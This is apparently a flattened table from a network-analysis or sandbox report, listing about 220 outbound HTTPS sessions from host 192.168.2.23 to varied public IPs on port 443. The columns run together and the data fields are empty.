                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27216192.168.2.236049271.53.115.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27217192.168.2.2356602119.62.161.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27218192.168.2.2341496142.31.58.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27219192.168.2.2350870181.120.113.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27220192.168.2.235678037.196.220.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27221192.168.2.2344736155.235.150.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27222192.168.2.2356562171.127.85.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27223192.168.2.234986666.37.169.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27224192.168.2.235224217.20.196.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27225192.168.2.235582868.103.168.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27226192.168.2.23556061.238.217.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27227192.168.2.234303441.87.174.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27228192.168.2.233525241.42.87.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27229192.168.2.23564269.27.232.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27230192.168.2.2347000164.146.52.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27231192.168.2.2359650114.73.117.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27232192.168.2.2359220161.160.116.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27233192.168.2.235209217.171.53.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27234192.168.2.2333210177.246.94.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27235192.168.2.235589657.223.180.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27236192.168.2.2340976120.114.9.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27237192.168.2.234497432.74.156.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27238192.168.2.2340962130.56.45.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27239192.168.2.235532432.192.164.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27240192.168.2.2336188204.134.100.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27241192.168.2.2339866109.165.58.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27242192.168.2.233604424.244.224.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27243192.168.2.23587425.19.253.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27244192.168.2.233400685.227.102.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27245192.168.2.235240895.198.116.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27246192.168.2.2355486184.195.180.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27247192.168.2.2345794217.178.204.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27248192.168.2.234310059.150.88.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27249192.168.2.235615243.70.240.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27250192.168.2.233492647.245.107.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27251192.168.2.2336002143.124.120.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27252192.168.2.233331245.96.120.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27253192.168.2.2353284128.208.98.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27254192.168.2.2334878217.170.114.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27255192.168.2.233362431.117.192.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27256192.168.2.2337716176.128.173.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27257192.168.2.2342734114.226.26.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27258192.168.2.233387818.226.3.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27259192.168.2.23405428.210.170.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27260192.168.2.2347766118.244.58.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27261192.168.2.2334874135.34.228.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27262192.168.2.2345168103.193.12.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27263192.168.2.234876672.39.41.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27264192.168.2.2357316146.167.139.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27265192.168.2.2334232155.17.121.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27266192.168.2.233866276.35.56.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27267192.168.2.235970636.192.20.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27268192.168.2.23492528.251.111.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27269192.168.2.2345232118.198.229.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27270192.168.2.233325844.25.69.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27271192.168.2.234182290.38.240.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27272192.168.2.2336796108.143.9.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27273192.168.2.2333806217.123.119.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27274192.168.2.234297271.124.186.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27275192.168.2.2338506173.103.58.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27276192.168.2.234684090.22.178.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27277192.168.2.2347856189.116.201.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27278192.168.2.2350948121.42.2.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27279192.168.2.235314454.145.197.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27280192.168.2.234853273.230.206.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27281192.168.2.2344684172.209.8.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27282192.168.2.234255877.192.80.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27283192.168.2.2337354168.145.43.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27284192.168.2.2338054137.242.116.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27285192.168.2.234211034.240.53.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27286192.168.2.2359070219.26.244.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27287192.168.2.2344722188.205.109.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27288192.168.2.235107842.172.17.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27289192.168.2.2346858144.198.125.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27290192.168.2.2357834123.166.238.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27291192.168.2.2358278128.81.126.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27292192.168.2.2349836191.78.222.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27293192.168.2.235325485.11.200.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27294192.168.2.2353190153.58.24.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27295192.168.2.235717070.47.93.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27296192.168.2.2348734187.184.108.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27297192.168.2.233792620.241.234.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27298192.168.2.233780681.95.215.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27299192.168.2.235120288.196.232.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27300192.168.2.234631682.128.167.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27301192.168.2.2355356210.192.234.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27302192.168.2.234748038.82.191.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27303192.168.2.2336354116.139.166.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27304192.168.2.233293641.197.186.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27305192.168.2.233886888.106.70.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27306192.168.2.235061441.86.24.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27307192.168.2.23451321.144.77.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27308192.168.2.235767666.198.102.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27309192.168.2.2334290135.252.22.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27310192.168.2.2355426148.185.90.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27311192.168.2.233305071.119.120.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27312192.168.2.2358272208.230.167.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27313192.168.2.2345150109.229.139.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27314192.168.2.235180478.170.176.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27315192.168.2.2359438175.172.8.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27316192.168.2.2356974170.176.109.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27317192.168.2.2334190211.175.185.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27318192.168.2.234508684.242.107.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27319192.168.2.235553461.251.43.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27320192.168.2.2351582173.158.190.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27321192.168.2.233369423.209.74.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27322192.168.2.2353168105.10.151.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27323192.168.2.2353632171.197.239.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27324192.168.2.233683284.59.124.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27325192.168.2.2342762117.242.84.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27326192.168.2.2347836168.26.46.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27327192.168.2.235117867.153.156.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27328192.168.2.2337362140.202.117.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27329192.168.2.2354334189.191.224.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27330192.168.2.233856698.202.19.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27331192.168.2.2346418104.22.165.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27332192.168.2.2339786213.126.57.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27333192.168.2.234931631.234.61.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27334192.168.2.233536061.239.53.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27335192.168.2.2333102222.44.61.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27336192.168.2.234376480.56.176.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27337192.168.2.233516263.211.87.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27338192.168.2.234698468.251.124.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27339192.168.2.233489091.8.123.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27340192.168.2.236068675.55.42.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27341192.168.2.233499458.7.27.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27342192.168.2.234397698.15.69.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27343192.168.2.2349354111.190.193.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27344192.168.2.2351668153.6.108.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27345192.168.2.234450036.106.134.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27346192.168.2.23422465.47.213.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27347192.168.2.235429824.87.95.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27348192.168.2.234278497.13.186.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27349192.168.2.234914234.165.173.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27350192.168.2.2354030169.151.71.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27351192.168.2.233701642.149.52.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27352192.168.2.235405863.8.221.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27353192.168.2.2358332149.210.140.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27354192.168.2.235738275.31.178.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27355192.168.2.2339568121.132.167.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27356192.168.2.2336438115.38.194.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27357192.168.2.2336060166.77.161.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27358192.168.2.2339900140.123.228.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27359192.168.2.233878068.57.173.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27360192.168.2.235325644.57.181.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27361192.168.2.2360968130.244.125.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27362192.168.2.234589041.17.31.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27363192.168.2.2337670107.6.255.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27364192.168.2.2360644159.84.18.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27365192.168.2.233818612.96.4.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27366192.168.2.234362497.106.229.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27367192.168.2.2346700122.218.107.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27368192.168.2.2344890144.99.91.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27369192.168.2.2349040102.74.87.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27370192.168.2.234613649.173.4.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27371192.168.2.236010639.174.148.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27372192.168.2.2346476197.143.247.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27373192.168.2.235927240.131.222.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27374192.168.2.2352482106.59.134.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27375192.168.2.2349756159.251.181.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27376192.168.2.2354618108.241.239.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27377192.168.2.2353636184.237.69.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27378192.168.2.2352348176.51.22.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27379192.168.2.2340416133.166.38.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27380192.168.2.233587277.68.44.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27381192.168.2.2353150110.19.216.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27382192.168.2.2351058104.171.26.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27383192.168.2.235908627.142.229.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27384192.168.2.2354620213.20.81.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27385192.168.2.2343422177.32.104.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27386192.168.2.2342524144.199.0.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27387192.168.2.2344368103.190.161.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27388192.168.2.2359372117.185.37.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27389192.168.2.2339404126.26.170.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27390192.168.2.2350230159.100.154.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27391192.168.2.2337230114.127.217.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27392192.168.2.233415268.4.161.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27393192.168.2.235958292.27.121.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27394192.168.2.2337582170.31.128.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27395192.168.2.2341908204.84.70.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27396192.168.2.234633218.238.63.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27397192.168.2.235906017.148.140.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27398192.168.2.234488614.214.50.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27399192.168.2.2335266143.187.189.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27400192.168.2.234478244.76.57.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27401192.168.2.235781295.154.45.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27402192.168.2.234105651.17.181.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27403192.168.2.2338432128.7.163.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27404192.168.2.2358596159.27.133.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27405192.168.2.234009444.42.193.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27406192.168.2.2335182213.34.56.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27407192.168.2.234295435.161.241.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27408192.168.2.2360394179.93.75.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27409192.168.2.235527851.23.188.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27410192.168.2.235476698.93.242.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27411192.168.2.2346442104.242.26.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27412192.168.2.235145264.77.41.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27413192.168.2.2358470157.244.177.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27414192.168.2.235010890.189.46.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27415192.168.2.2353164162.49.128.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27416192.168.2.233573481.74.88.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27417192.168.2.2338920194.247.25.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27418192.168.2.2354806114.144.158.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27419192.168.2.2336608173.249.1.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27420192.168.2.235436019.124.183.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27421192.168.2.233816627.181.13.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27422192.168.2.235332841.46.225.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27423192.168.2.234903427.173.244.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27424192.168.2.234654638.40.145.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27425192.168.2.235122435.191.161.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27426192.168.2.234460032.210.172.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27427192.168.2.2340488115.6.99.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27428192.168.2.233560685.27.196.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27429192.168.2.2359298167.211.191.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27430192.168.2.2343524200.188.41.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27431192.168.2.2333376136.69.71.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27432192.168.2.2352148180.22.203.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27433192.168.2.235616051.253.234.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27434192.168.2.234497431.81.16.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27435192.168.2.2351218118.98.87.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27436192.168.2.2354984196.74.167.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27437192.168.2.234064288.157.151.217443
                                            TimestampBytes transferredDirectionData


